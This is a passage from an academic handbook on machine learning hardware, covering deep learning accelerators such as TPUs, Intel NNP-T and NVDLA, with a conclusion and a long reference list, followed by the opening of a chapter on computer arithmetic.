architecture (combine standard instruction execution with dataflow principles) and
self-timed logic (i.e., asynchronous logic) implementation. The Wave DPU consists
of 1,024 clusters, and each cluster contains 16 processing elements plus other
additional shared compute units. Each cluster operates asynchronously, and its peak
operating frequency could be as high as 10 GHz, while a self-timed interlocking
network is designed to synchronize neighboring clusters. The chip integrates four
HMC interfaces (each holds 2 GB memory) and two 64-bit DDR4-2400 memory
interfaces. A 16-lane PCI Express Gen3 interface is also included to connect to a
host processor or network.
Yang (2019): Intel’s training chip, namely, neural network processors training
(NNP-T), is a direct descendent of Nervana’s original ASIC design. While first-
generation NNT-Ps are not productized, second-generation NNP-Ts are branded as
the NNP T-1000 series and are the first chips to be productized. Fabricated TSMC’s
16 nm process based on the Spring Crest microarchitecture, those chips feature
several enhancements and refinements over the prior generation including a shift
from Flexpoint to Bfloat16 and considerable performance uplift. Intel claims that
these chips have about 3–4× the training performance of the first generation. All
NNP-T 1000 chips come with 32 GB of four HBM2 stacks in a CoWoS package
and come in two form factors: PCIe Gen 3 and an OCP OAM accelerator card.
Jouppi et al. (2020): The first generation of Google’s Tensor Processing Unit
(TPU), i.e., TPUv1, is an inference chip, while TPUv2, TPUv3, and TPUv4 are
training chips. Take TPUv2, for example; each chip contains two TensorCore (not
related to the Tensor Cores of NVIDIA GPUs). The TensorCore consists of an
Inter-Core Interconnect, HBM, the Core Sequencer, Vector Processing Unit, the
MUX that produces 32-bit FP products from 16-bit FP inputs, and the Transpose
Reduction Permute Unit. Up to 256 TPUv2 chips can be connected through the 2D-
torus topology to create the supercomputer for training. The peak performance of
the TPUv2 chip is 46 TeraFLOPS (in 16 bits) or 3 TeraFLOPS (in 32 bits), and its
thermal design power is 280 Watts per chip.
synthesis and simulation model in RTL form, and the TLM SystemC simulation
model can be used for software development, system integration, and testing. The
NVDLA software ecosystem includes an on-device software stack, a full training
infrastructure to build new models that incorporate deep learning, and parsers that
convert existing models to a form that is usable by the on-device software. NVDLA
is open-source at https://github.com/nvdla
Moreau et al. (2019): The Versatile Tensor Accelerator (VTA) is an open, generic,
and customizable deep learning accelerator with a complete TVM-based compiler
stack. VTA is designed to expose the most salient and common characteristics of
mainstream deep learning accelerators. Together TVM and VTA form an end-to-
end hardware-software deep learning system stack that includes hardware design,
drivers, a JIT runtime, and an optimizing compiler stack based on TVM. VTA is
open-source at https://github.com/apache/tvm/
Xu et al. (2020): As introduced in the DSE subsection, the design exploration tool
by Rice University is open-sourced at https://github.com/RICE-EIC/AutoDNNchip.
git
A parallel digital VLSI architecture is proposed to deal with SVM training and
classification (Wang et al. 2014). The architecture splits data into multiple basic
SVM units capable of processing variable data size with distributed cache memory.
The communication is performed via a multilayer system bus that minimizes
communication overhead.
Conclusions
With the emerging demand for not only neuroscience research but also commercial
tasks like classification and recognition, various architectures for accelerating AI
algorithms including neuromorphic computing/SNN and ANNs have been raised.
Large-scale neuromorphic chips with complex neuronal mechanisms, such as
SpiNNaker, Neurogrid, and BrainScales, have been built for simulation of the
biological brain. Also, many neuromorphic chips, such as TrueNorth, Loihi, ODIN,
and Tianjic, have been designed based on simplified neural and synaptic primi-
tives to perform commercial tasks. These neuromorphic chips, built with analog
circuits or synchronous or asynchronous digital circuits, can achieve extremely
low-power consumption thanks to the event-driven characteristic of neuromorphic
computing. In terms of algorithm, software framework, and dedicated hardware,
real-valued-based artificial neural networks with simple models are more practical
than neuromorphic computing. When designing an architecture for ANNs, several
design metrics have to be considered, including accuracy, performance, power
372 Y. Yang et al.
References
Akopyan F, Sawada J, Cassidy A, Alvarez-Icaza R, Arthur J, Merolla P, Imam N, Nakamura
Y, Datta P, Nam GJ, Taba B (2015) Truenorth: design and tool flow of a 65 mw 1 million
neuron programmable neurosynaptic chip. IEEE Trans Comput-Aided Des Integr Circuits Syst
34(10):1537–1557
Albericio J, Judd P, Hetherington T, Aamodt T, Jerger NE, Moshovos A (2016) Cnvlutin:
ineffectual-neuron-free deep neural network computing. ACM SIGARCH Comput Archit News
44(3):1–13
Albericio J, Delmás A, Judd P, Sharify S, O’Leary G, Genov R, Moshovos A (2017) Bit-pragmatic
deep neural network computing. In: Proceedings of the 50th Annual IEEE/ACM International
Symposium on Microarchitecture, pp 382–394
Amravati A, Nasir SB, Thangadurai S, Yoon I, Raychowdhury A (2018) A 55nm time-domain
mixed-signal neuromorphic accelerator with stochastic synapses and embedded reinforcement
learning for autonomous micro-robots. In: 2018 IEEE International Solid-State Circuits
Conference-(ISSCC). IEEE, pp 124–126
Anwani N, Rajendran B (2015) Normad-normalized approximate descent based supervised
learning rule for spiking neurons. In 2015 international joint conference on neural networks
(IJCNN). IEEE, pp 1–8
Azizimazreah A, Chen L (2019) Shortcut mining: exploiting cross-layer shortcut reuse in
dcnn accelerators. In: 2019 IEEE International Symposium on High Performance Computer
Architecture (HPCA). IEEE, pp 94–105
Benjamin BV, Gao P, McQuinn E, Choudhary S, Chandrasekaran AR, Bussat JM, Alvarez-Icaza R,
Arthur JV, Merolla PA, Boahen K (2014) Neurogrid: a mixed-analog-digital multichip system
for large-scale neural simulations. Proc IEEE 102(5):699–716
Berdan R, Marukame T, Kabuyanagi S, Ota K, Saitoh M, Fujii S (2019) In-memory reinforcement
learning with moderatelystochastic conductance switching of ferroelectric tunnel junctions. In:
Proceeding Symposium on VLSI Technology, pp 22–23
Bi GQ, Poo MM (1998) Synaptic modifications in cultured hippocampal neurons: dependence on
spike timing, synaptic strength, and postsynaptic cell type. J Neurosci 18(24):10464–10472
Bo D et al OR-ML: enhancing reliability for machine learning accelerator with opportunistic
redundancy. In: 2021 IEEE Design, Automation and Test in Europe Conference (DATE) (2021)
Bohte SM, Kok JN, La Poutre H (2002) Error-backpropagation in temporally encoded networks of
spiking neurons. Neurocomputing 48(1–4):17–37
Brader JM, Senn W, Fusi S (2007) Learning real-world stimuli in a neural network with spike-
driven synaptic dynamics. Neural Comput 19(11):2881–2912
Buckler M, Bedoukian P, Jayasuriya S, Sampson A (2018) EVA2: exploiting temporal redundancy
in live computer vision. In: 2018 ACM/IEEE 45th Annual International Symposium on
Computer Architecture (ISCA). IEEE, pp 533–546
Cai R, Ren A, Liu N, Ding C, Wang L, Qian X, Pedram M, Wang Y (2018) Vibnn: hardware
acceleration of Bayesian neural networks. ACM SIGPLAN Not 53(2):476–488
10 Architectures for Machine Learning 373
Cai H, Gan C, Wang T, Zhang Z, Han S (2019) Once-for-all: train one network and specialize it
for efficient deployment. arXiv preprint arXiv:1908.09791
Chakradhar S, Sankaradas M, Jakkula V, Cadambi S (2010) A dynamically configurable copro-
cessor for convolutional neural networks. In: Proceedings of the 37th Annual International
Symposium on Computer Architecture, pp 247–257
Chattopadhyay A, Meyr H, Leupers R (2008) LISA: a uniform ADL for embedded processor mod-
eling, implementation, and software toolsuite generation. In: Processor description languages.
Morgan Kaufmann, San Francisco, pp 95–132
Chen T, Du Z, Sun N, Wang J, Wu C, Chen Y, Temam O (2014a) Diannao: a small-footprint high-
throughput accelerator for ubiquitous machine-learning. ACM SIGARCH Comput Archit News
42(1):269–284
Chen Y, Luo T, Liu S, Zhang S, He L, Wang J, Li L, Chen T, Xu Z, Sun N, Temam O (2014b)
Dadiannao: a machine-learning supercomputer. In: 2014 47th Annual IEEE/ACM International
Symposium on Microarchitecture. IEEE, pp 609–622
Chen YH, Emer J, Sze V (2016) Eyeriss: a spatial architecture for energy-efficient dataflow for
convolutional neural networks. ACM SIGARCH Comput Archit News 44(3):367–379
Chen T, Moreau T, Jiang Z, Zheng L, Yan E, Shen H, Cowan M, Wang L, Hu Y, Ceze L, Guestrin C
(2018) TVM: an automated end-to-end optimizing compiler for deep learning. In: 13th USENIX
Symposium on Operating Systems Design and Implementation (OSDI 18), pp 578–594
Chen Y-H, Yang T-J, Emer J, Sze V (2019) Eyeriss v2: a flexible accelerator for emerging deep
neural networks on mobile devices. IEEE J Emerg Sel Top Circuits Syst 9(2):292–308
Chen Y, Xie Y, Song L, Chen F, Tang T (2020) A survey of accelerator architectures for deep neural
networks. Engineering 6(3):264–274
Chen W et al (2021) Improving system latency of AI accelerator with on-chip pipelined activation
preprocessing and multi-mode batch inference. In: IEEE International Conference on Artificial
Intelligence Circuits and Systems. IEEE
Chetlur S, Woolley C, Vandermersch P, Cohen J, Tran J, Catanzaro B, Shelhamer E (2014) cudnn:
efficient primitives for deep learning. arXiv preprint arXiv:1410.0759
Chicca E, Stefanini F, Bartolozzi C, Indiveri G (2014) Neuromorphic electronic circuits for
building autonomous cognitive systems. Proc IEEE 102(9):1367–1388
Cho H, Oh P, Park J, Jung W, Lee J (2019) Fa3c: FPGA-accelerated deep reinforcement learning.
In: Proceedings of the Twenty-Fourth International Conference on Architectural Support for
Programming Languages and Operating Systems, pp 499–513
Coates A, Huval B, Wang T, Wu D, Catanzaro B, Andrew N (2013) Deep learning with COTS
HPC systems. In: International Conference on Machine Learning. PMLR, pp 1337–1345
Dally B (2021) Sustainable computing via domain-specific architecture and efficient circuits.
DATE Special Day on Sustainable HPC
Davies M, Srinivasa N, Lin TH, Chinya G, Cao Y, Choday SH, Dimou G, Joshi P, Imam N, Jain
S, Liao Y (2018) Loihi: a neuromorphic manycore processor with on-chip learning. Ieee Micro
38(1):82–99
Devlin J, Chang MW, Lee K, Toutanova K (2018) Bert: pre-training of deep bidirectional
transformers for language understanding. arXiv preprint arXiv:1810.04805
Ditzel D, Kuroda T, Lee S (2014) Low-cost 3D chip stacking with ThruChip wireless connections.
In: Proceedings of IEEE Hot Chips Symposium (HCS), pp 1–37
Dong C, Loy CC, Tang X (2016) Accelerating the super-resolution convolutional neural network.
In: European Conference on Computer Vision. Springer (2016), pp 391–407
Du Z, Fasthuber R, Chen T, Ienne P, Li L, Luo T, Feng X, Chen Y, Temam O (2015) ShiDianNao:
shifting vision processing closer to the sensor. In: Proceedings of the 42nd Annual International
Symposium on Computer Architecture, pp 92–104
Folowosele F, Harrison A, Cassidy A, Andreou AG, Etienne-Cummings R, Mihalas S, Niebur E,
Hamilton TJ (2009) A switched capacitor implementation of the generalized linear integrate-
and-fire neuron. In: 2009 IEEE International Symposium on Circuits and Systems (ISCAS).
IEEE, pp 2149–2152
374 Y. Yang et al.
Freericks M (1991) The nML machine description formalism. Leiter der Fachbibliothek Infor-
matik, Sekretariat FR 5–4
Frenkel C, Lefebvre M, Legat JD, Bol D (2018) A 0.086-mm 2 12.7-pj/sop 64k-synapse 256-neuron
online-learning digital spiking neuromorphic processor in 28-nm CMOS. IEEE Trans Biomed
Circuits Syst 13(1):145–158
Friedmann S, Schemmel J, Grübl A, Hartel A, Hock M, Meier K (2016) Demonstrating hybrid
learning in a flexible neuromorphic hardware system. IEEE Trans Biomed Circuits Syst
11(1):128–142
Furber SB, Galluppi F, Temple S, Plana LA (2014) The spinnaker project. Proc IEEE 102(5):652–
665
Gao M, Pu J, Yang X, Horowitz M, Kozyrakis C (2017) Tetris: scalable and efficient neural network
acceleration with 3d memory. In: Proceedings of the Twenty-Second International Conference
on Architectural Support for Programming Languages and Operating Systems, pp 751–764.
Gao C, Neil D, Ceolini E, Liu SC, Delbruck T (2018) DeltaRNN: a power-efficient recurrent neural
network accelerator. In: Proceedings of the 2018 ACM/SIGDA International Symposium on
Field-Programmable Gate Arrays, pp 21–30
Geng T, Li A, Shi R, Wu C, Wang T, Li Y, Haghi P, Tumeo A, Che S, Reinhardt S, Herbordt
MC (2020) AWB-GCN: a graph convolutional network accelerator with runtime workload
rebalancing. In: 2020 53rd Annual IEEE/ACM International Symposium on Microarchitecture
(MICRO). IEEE, pp 922–936
Ghosh-Dastidar S, Adeli H (2009) A new supervised learning algorithm for multiple spiking neural
networks with application in epilepsy and seizure detection. Neural Netw 22(10):1419–1431
Gokhale V, Jin J, Dundar A, Martini B, Culurciello E (2014) A 240 G-ops/s mobile coprocessor
for deep neural networks. In: CVPR Workshop, pp 682–687
Guo R, Liu Y, Zheng S, Wu SY, Ouyang P, Khwa WS, Chen X, Chen JJ, Li X, Liu L, Chang MF
(2019) A 5.1 pJ/neuron 127.3 us/inference RNN-based speech recognition processor using 16
computing-in-memory SRAM macros in 65 nm CMOS. In: 2019 Symposium on VLSI Circuits.
IEEE, pp C120–C121
Gwennap L (2016) Wave accelerates deep learning-new dataflow processor targets 10x speedup
for neural networks. The Linley MicroProcessor Report
Ham TJ, Jung SJ, Kim S, Oh YH, Park Y, Song Y, Park JH, Lee S, Park K, Lee JW, Jeong DK
(2020) A3̂: accelerating attention mechanisms in neural networks with approximation. In: 2020
IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE,
pp 328–341
Han S, Liu X, Mao H, Pu J, Pedram A, Horowitz MA, Dally WJ (2016) EIE: efficient inference
engine on compressed deep neural network. ACM SIGARCH Comput Archit News 44(3):243–
254
Han S, Kang J, Mao H, Hu Y, Li X, Li Y, Xie D, Luo H, Yao S, Wang Y, Yang H (2017) Ese:
efficient speech recognition engine with sparse LSTM on FPGA. In: Proceedings of the 2017
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays, pp 75–84
Hegde K, Agrawal R, Yao Y, Fletcher CW (2018) Morph: flexible acceleration for 3d cnn-
based video understanding. In: 2018 51st Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 933–946
Herculano-Houzel S (2009) The human brain in numbers: a linearly scaled-up primate brain. Front
Hum Neurosci 3:31
Hosomi M, Yamagishi H, Yamamoto T, Bessho K, Higo Y, Yamane K, Yamada H, Shoji M,
Hachino H, Fukumoto C, Nagao H (2005) A novel nonvolatile memory with spin torque transfer
magnetization switching: spin-RAM. In: IEEE InternationalElectron Devices Meeting, 2005.
IEDM Technical Digest. IEEE, pp 459–462
Iandola FN, Han S, Moskewicz MW, Ashraf K, Dally WJ, Keutzer K (2016) SqueezeNet:
AlexNet-level accuracy with 50x fewer parameters and <0.5 MB model size. arXiv preprint
arXiv:1602.07360
Iandola FN, Shaw AE, Krishna R, Keutzer KW (2020) SqueezeBERT: what can computer vision
teach NLP about efficient neural networks? arXiv preprint arXiv:2006.11316
10 Architectures for Machine Learning 375
Indiveri G, Chicca E, Douglas RJ (2006) A VLSI array of low-power spiking neurons and bistable
synapses with spike–timing dependent plasticity. IEEE Trans Neural Netw 17(1):211–221
Izhikevich EM (2003) Simple model of spiking neurons. IEEE Trans Neural Netw 14(6):1569–
1572
James M et al (2020) Ispd 2020 physical mapping of neural networks on a wafer-scale deep
learning accelerator. In: Proceedings of the 2020 International Symposium on Physical Design
Jeddeloh J, Keeth B (2012) Hybrid memory cube new DRAM architecture increases density and
performance. In: 2012 Symposium on VLSI Technology (VLSIT). IEEE, pp 87–88
Jia T, Ju Y, Joseph R, Gu J (2020) NCPU: an embedded neural CPU architecture on resource-
constrained low power devices for real-time end-to-end performance. In: 2020 53rd Annual
IEEE/ACM International Symposium on Microarchitecture (MICRO). IEEE, pp 1097–1109
Joulin A, Cissé M, Grangier D, Jégou H (2017) Efficient softmax approximation for GPUs. In:
International Conference on Machine Learning. PMLR, pp 1302–1310
Jouppi NP, Young C, Patil N, Patterson D, Agrawal G, Bajwa R, Bates S, Bhatia S, Boden N,
Borchers A, Boyle R (2017) In-datacenter performance analysis of a tensor processing unit. In:
Proceedings of the 44th Annual International Symposium on Computer Architecture, pp 1–12
Jouppi NP, Yoon DH, Kurian G, Li S, Patil N, Laudon J, Young C, Patterson D (2020) A domain-
specific supercomputer for training deep neural networks. Commun ACM 63(7):67–78
Judd P, Albericio J, Hetherington T, Aamodt TM, Moshovos A (2016) Stripes: bit-serial deep
neural network computing. In: 2016 49th Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 1–12
Keutzer K. What every NN accelerator architect should know about deep learning applications
and software. In: keynote of 2021 IFIP/IEEE International Conference on Very Large Scale
Integration (VLSI-SoC)
Kim D, Kung J, Chai S, Yalamanchili S, Mukhopadhyay S (2016) Neurocube: a programmable
digital neuromorphic architecture with high-density 3D memory. ACM SIGARCH Comput
Archit News 44(3):380–392
Kim H, Sim J, Choi Y, Kim LS (2019) Nand-net: minimizing computational complexity of in-
memory processing for binary neural networks. In: 2019 IEEE International Symposium on
High Performance Computer Architecture (HPCA). IEEE, pp 661–673
Kim S, Gholami A, Yao Z, Mahoney MW, Keutzer K (2021a) I-bert: integer-only bert quantization.
In: International Conference on Machine Learning. PMLR, pp 5506–5518
Kim S, Gholami A, Yao Z, Nrusimha A, Zhai B, Gao T, Mahoney MW, Keutzer K (2021b) Q-
ASR: Integer-Only Zero-Shot Quantization for Efficient Speech Recognition. arXiv e-prints,
arXiv-2103
Ko GG, Chai Y, Donato M, Whatmough PN, Tambe T, Rutenbar RA, Brooks D, Wei GY (2020)
A 3mm 2 programmable Bayesian inference accelerator for unsupervised machine perception
using parallel Gibbs sampling in 16nm. In: 2020 IEEE Symposium on VLSI Circuits. IEEE,
pp 1–2
Korat UA, Alimohammad A (2019) A reconfigurable hardware architecture for principal compo-
nent analysis. Circuits Syst Sig Process 38(5):2097–2113
Krizhevsky A, Sutskever I, Hinton GE (2012) Imagenet classification with deep convolutional
neural networks. Adv Neural Inf Process Syst 25:1097–1105
Kwon H, Samajdar A, Krishna T (2018) Maeri: enabling flexible dataflow mapping over DNN
accelerators via reconfigurable interconnects. ACM SIGPLAN Not 53(2):461–475
Lee DU, Kim KW, Kim KW, Kim H, Kim JY, Park YJ, Kim JH, Kim DS, Park HB, Shin JW,
Cho JH (2014) 25.2 A 1.2 V 8Gb 8-channel 128GB/s high-bandwidth memory (HBM) stacked
DRAM with effective microbump I/O test methods using 29nm process and TSV. In: 2014
IEEE International Solid-State Circuits Conference Digest of Technical Papers (ISSCC). IEEE,
pp 432–433
Lee J, Kim C, Kang S, Shin D, Kim S, Yoo H (2018) UNPU: a 50.6TOPS/W unified deep
neural network accelerator with 1b-to-16b fully-variable weight bit-precision. In: 2018 IEEE
International Solid – State Circuits Conference (ISSCC), pp 218–220
376 Y. Yang et al.
Lee J, Shin D, Lee J, Lee J, Kang S, Yoo HJ (2019) A full HD 60 fps CNN super resolution
processor with selective caching based layer fusion for mobile devices. In: 2019 Symposium on
VLSI Circuits. IEEE, pp C302–C303
Li Z, Ding C, Wang S, Wen W, Zhuo Y, Liu C, Qiu Q, Xu W, Lin X, Qian X, Wang Y (2019a)
E-RNN: Design optimization for efficient recurrent neural networks in FPGAs. In: 2019 IEEE
International Symposium on High Performance Computer Architecture (HPCA). IEEE, pp 69–
80
Li Y, Liu IJ, Yuan Y, Chen D, Schwing A, Huang J (2019b) Accelerating distributed reinforcement
learning with in-switch computing. In: 2019 ACM/IEEE 46th Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 279–291
Li J, Louri A, Karanth A, Bunescu R (2021) GCNAX: a flexible and energy-efficient accelerator
for graph convolutional neural networks. In: 2021 IEEE International Symposium on High-
Performance Computer Architecture (HPCA). IEEE, pp 775–788
Lines A, Joshi P, Liu R, McCoy S, Tse J, Weng YH, Davies M (2018) Loihi asynchronous
neuromorphic research chip. In: 2018 24th IEEE International Symposium on Asynchronous
Circuits and Systems (ASYNC). IEEE, pp 32–33
Liu D, Chen T, Liu S, Zhou J, Zhou S, Teman O, Feng X, Zhou X, Chen Y (2015) Pudiannao: a
polyvalent machine learning accelerator. ACM SIGARCH Comput Archit News 43(1):369–381
Liu S, Du Z, Tao J, Han D, Luo T, Xie Y, Chen Y, Chen T (2016) Cambricon: an instruction set
architecture for neural networks. In: 2016 ACM/IEEE 43rd Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 393–405
Liu C, Bellec G, Vogginger B, Kappel D, Partzsch J, Neumärker F, Höppner S, Maass W,
Furber SB, Legenstein R, Mayr CG (2018) Memory-efficient deep learning on a spinnaker 2
prototype. Front Neurosci 12:840
Lu W, Yan G, Li J, Gong S, Han Y, Li X (2017) Flexflow: a flexible dataflow accelerator
architecture for convolutional neural networks. In: 2017 IEEE International Symposium on High
Performance Computer Architecture (HPCA). IEEE, pp 553–564
Maher MAC, Deweerth SP, Mahowald MA, Mead CA (1989) Implementing neural architectures
using analog VLSI circuits. IEEE Trans Circuits Syst 36(5):643–652
Mahmoud M, Siu K, Moshovos A (2018) Diffy: a Déjà vu-free differential deep neural network
accelerator. In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture
(MICRO). IEEE, pp 134–147
Martin AJ (1990) The limitations to delay-insensitivity in asynchronous circuits. In: Beauty is our
business. Springer, New York, pp 302–311
Martin AJ, Nyström M (2004) CAST: Caltech asynchronous synthesis tools. In: Asynchronous
Circuit Design Working Group Workshop, Turku
Mead C (1990) Neuromorphic electronic systems. Proc IEEE 78(10):1629–1636
Meng H, Appiah K, Hunter A, Dickinson P (2011) FPGA implementation of naive bayes classifier
for visual object recognition. In: CVPR 2011 WORKSHOPS. IEEE, pp 123–128
Mitchell TM (1997) Machine learning. McGraw Hill. ISBN 0-07-042807-7
Molchanov P, Hall J, Yin H, Kautz J, Fusi N, Vahdat A (2021) HANT: hardware-aware network
transformation. arXiv preprint arXiv:2107.10624
Moons B, Uytterhoeven R, Dehaene W, Verhelst M (2017) 14.5 envision: a 0.26-to-10tops/w
subword-parallel dynamic-voltage-accuracy-frequency-scalable convolutional neural network
processor in 28 nm FDSOI. In: 2017 IEEE International Solid-State Circuits Conference
(ISSCC). IEEE, pp 246–247
Moreau T, Chen T, Vega L, Roesch J, Yan E, Zheng L, Fromm J, Jiang Z, Ceze L, Guestrin C
(2019) A hardware–software blueprint for flexible deep learning specialization. IEEE Micro
39(5):8–16
Norrie T, Patil N, Yoon DH, Kurian G, Li S, Laudon J, Young C, Jouppi NP, Patterson DA (2020)
Google’s Training Chips Revealed: TPUv2 and TPUv3. In: Hot Chips Symposium, pp 1–70
NVIDIA (2017) NVIDIA deep learning accelerator (NVDLA). http://nvdla.org
Papadonikolakis M, Bouganis CS (2012) Novel cascade FPGA accelerator for support vector
machines classification. IEEE Trans Neural Netw Learn Syst 23(7):1040–1052
10 Architectures for Machine Learning 377
Peemen M, Setio AAA, Mesman B, Corporaal H (2013) Memory-centric accelerator design for
convolutional neural networks. In: IEEE International Conference on Computer Design (ICCD),
pp 13–19
Pei J, Deng L, Song S, Zhao M, Zhang Y, Wu S, Wang G, Zou Z, Wu Z, He W, Chen F
(2019) Towards artificial general intelligence with hybrid Tianjic chip architecture. Nature
572(7767):106–111
Reagen B, Whatmough P, Adolf R, Rama S, Lee H, Lee SK, Hernández-Lobato JM, Wei GY,
Brooks D (2016) Minerva: enabling low-power, highly-accurate deep neural network acceler-
ators. In: 2016 ACM/IEEE 43rd Annual International Symposium on Computer Architecture
(ISCA). IEEE, pp 267–278
Riera M, Arnau JM, González A (2018) Computation reuse in DNNs by exploiting input similarity.
In: 2018 ACM/IEEE 45th Annual International Symposium on Computer Architecture (ISCA).
IEEE, pp 57–68
Ryu S, Kim H, Yi W, Kim JJ (2019) Bitblade: area and energy-efficient precision-scalable neural
network accelerator with bitwise summation. In: Proceedings of the 56th Annual Design
Automation Conference 2019, pp 1–6
Sandler M, Howard A, Zhu M, Zhmoginov A, Chen LC (2018) Mobilenetv2: inverted residuals
and linear bottlenecks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern
Recognition, pp 4510–4520
Sanh V, Debut L, Chaumond J, Wolf T (2019) DistilBERT, a distilled version of BERT: smaller,
faster, cheaper and lighter. arXiv preprint arXiv:1910.01108
Sanh V, Wolf T, Rush A (2020) Movement pruning: adaptive sparsity by fine-tuning. Adv Neural
Inf Process Syst 33:20378–20389
Saqib F, Dutta A, Plusquellic J, Ortiz P, Pattichis MS (2013) Pipelined decision tree classification
accelerator implementation in FPGA (DT-CAIF). IEEE Trans Comput 64(1):280–285
Schemmel J, Brüderle D, Grübl A, Hock M, Meier K, Millner S (2010) A e neuromorphic hardware
system for large-scale neural modeling. In: 2010 IEEE International Symposium on Circuits and
Systems (ISCAS). IEEE, pp 1947–1950
Schuman CD, Potok TE, Patton RM, Birdwell JD, Dean ME, Rose GS, Plank JS (2017) A survey
of neuromorphic computing and neural networks in hardware. arXiv preprint arXiv:1705.06963
Sharma H, Park J, Suda N, Lai L, Chau B, Chandra V, Esmaeilzadeh H (2018) Bit fusion: bit-
level dynamically composable architecture for accelerating deep neural network. In: 2018
ACM/IEEE 45th Annual International Symposium on Computer Architecture (ISCA). IEEE,
pp 764–775
Shen J, Huang Y, Wang Z, Qiao Y, Wen M, Zhang C (2018) Towards a uniform template-
based architecture for accelerating 2D and 3D CNNs on FPGA. In: Proceedings of the 2018
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays, pp 97–106
Sun Z, Yu H, Song X, Liu R, Yang Y, Zhou D (2019) Mobilebert: task-agnostic compression of
bert by progressive knowledge transfer
Sun Z, Yu H, Song X, Liu R, Yang Y, Zhou D (2020) Mobilebert: a compact task-agnostic bert for
resource-limited devices. arXiv preprint arXiv:2004.02984
Sze V, Chen YH, Yang TJ, Emer JS (2017) Efficient processing of deep neural networks: a tutorial
and survey. Proc IEEE 105(12):2295–2329
Tambe T, Yang EY, Ko GG, Chai Y, Hooper C, Donato M, Whatmough PN, Rush AM, Brooks
D, Wei GY (2021) 9.8 A 25 mm 2 SoC for IoT devices with 18 ms noise-robust speech-to-text
latency via Bayesian speech denoising and attention-based sequence-to-sequence DNN speech
recognition in 16 nm FinFET. In: 2021 IEEE International Solid-State Circuits Conference
(ISSCC), vol 64. IEEE, pp 158–160
Tay Y, Dehghani M, Abnar S, Shen Y, Bahri D, Pham P, Rao J, Yang L, Ruder S, Metzler D (2020)
Long range arena: a benchmark for efficient transformers. arXiv preprint arXiv:2011.04006
Temam O (2012) A defect-tolerant accelerator for emerging high-performance applications. In:
2012 39th Annual International Symposium on Computer Architecture (ISCA). IEEE, pp 356–
367
378 Y. Yang et al.
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
Definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Radix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Positional Notation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Absolute Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Relative Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Numerical Precision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Units in the Last Place . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Machine Epsilon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Floating-Point Operations Per Second . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Integer Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Gray Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388
Unary Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Fixed-Point Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Floating-Point Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
IEEE 754 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Floating-Point Approximate Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Posit Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Other Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Hardware Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Adders . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Multipliers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Dividers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Square Root . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
F. Merchant ()
University of Groningen, Groningen, The Netherlands
e-mail: [email protected]
Abstract
Computer arithmetic has been an active area of research since the advent of
computers. The number system study diverged to fit the underlying computer
architecture and applications. The acceleration of arithmetic circuits has been
